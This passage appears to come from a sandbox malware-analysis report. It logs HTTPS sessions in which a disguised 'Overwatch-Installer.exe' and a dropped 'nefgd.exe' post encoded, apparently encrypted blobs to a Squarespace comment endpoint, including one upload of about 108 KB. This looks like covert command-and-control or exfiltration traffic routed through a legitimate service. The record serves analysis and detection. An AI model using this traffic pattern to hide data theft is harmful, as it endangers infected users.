=xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2x7xefKsU9QXnt5NV76PO7qif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXin7bC76MFANTA0YjRiZTVkODEzNTU4NGIxNWM3MjcyMmVlNmI0; Path=/; Secure Set-Cookie: crumb=Bd1OfMCIoSqnMmZhODIyOTgzZmM2MmIyNjJhZjA2YzkwNjNkMzAz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: aUlGTOVD/beOEw7nF Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bd1OfMCIoSqnMmZhODIyOTgzZmM2MmIyNjJhZjA2YzkwNjNkMzAz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49820	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:53 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:53 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbMkCQ0KNjxpN2NmMjUwZDNmMzMzYjEzYjlkZThiM2JmMTIwN2Q4; Path=/; Secure Set-Cookie: crumb=BVp1tuHPP3UsZGY1NzFmZWI0YmUwMGYyMDg0NjkyMzg4MWQ0OWZj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DTIwZgMx/9bNHXAUl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVp1tuHPP3UsZGY1NzFmZWI0YmUwMGYyMDg0NjkyMzg4MWQ0OWZj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49821	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:53 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:53 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:53 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:53 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BepgMy_gj5kUNTI1ODcwMTg3OTFlZTI1ODI3ZjQ2Mzk5ODMzYzFj; Path=/; Secure Set-Cookie: crumb=BbViPa611eJ4Y2VjN2JmY2MyNWUxMmVjNTlhNmU5ZWJiYjFiNTdh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xVvHATsn/r1zgMK2C Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BbViPa611eJ4Y2VjN2JmY2MyNWUxMmVjNTlhNmU5ZWJiYjFiNTdh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	49822	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:54 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:54 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 78 37 78 65 66 4b 73 55 39 51 58 6e 74 35 4e 56 37 36 50 4f 37 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2x7xefKsU9QXnt5NV76PO7qif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbFHy_Xyq7R2MDhmNjE1ZTZkMTE2NWQwZTJmYWUyNzViMDM1YTI3; Path=/; Secure Set-Cookie: crumb=BW_Lz58sgmInNjZjNGE0MmU0YTVlZDkzOWY1MGRiZjk5ZTFiYmEz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Oq5n72XQ/LSswhYiD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BW_Lz58sgmInNjZjNGE0MmU0YTVlZDkzOWY1MGRiZjk5ZTFiYmEz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	49823	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:54 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:54 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 54 67 53 6d 33 58 72 6c 55 54 55 67 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmTgSm3XrlUTUggVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:54 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:54 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:54 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:54 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUro_StIp6-jMDc5MWY4MDBlZTRjODJmM2IxNmIxNGU1NTBiZmQx; Path=/; Secure Set-Cookie: crumb=BRs3g4AbrpeKZDUyMGQ0NzFiZTI4NGQ3NGY2NTEyNjIzODI5NmM5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: x6d52gaG/hR24GWBc Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRs3g4AbrpeKZDUyMGQ0NzFiZTI4NGQ3NGY2NTEyNjIzODI5NmM5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	49824	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:54 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:54 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZLqfH8wzsWxN2IzM2JlZDMwNzA1MjA4MzdmODViN2Y2N2NkNzI3; Path=/; Secure Set-Cookie: crumb=BZ74FhF-_pi6ZDg1N2M4Nzc3MjY3ZDM1ODFiN2FhZGI0NDNjZTRk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: l3jegtEA/egnDcPhV Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZ74FhF-_pi6ZDg1N2M4Nzc3MjY3ZDM1ODFiN2FhZGI0NDNjZTRk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	49825	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:54 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:54 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 4f 57 59 39 46 2f 57 46 31 4a 4b 6c 55 57 6c 4a 4c 79 71 69 65 61 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2OWY9F/WF1JKlUWlJLyqieaif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQHrk6f4t99CMjQ3YjdlYjk4ZTExOGNkMTdkNmRhZWNmMjFmMDZm; Path=/; Secure Set-Cookie: crumb=BaHmlYvvMYAbNTBlYTNjYmRkMzIyZDEwMjY2MzFhZDU5MGU2Y2Fh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xifcv1yd/FKv65HYY Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaHmlYvvMYAbNTBlYTNjYmRkMzIyZDEwMjY2MzFhZDU5MGU2Y2Fh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49826	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:55 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
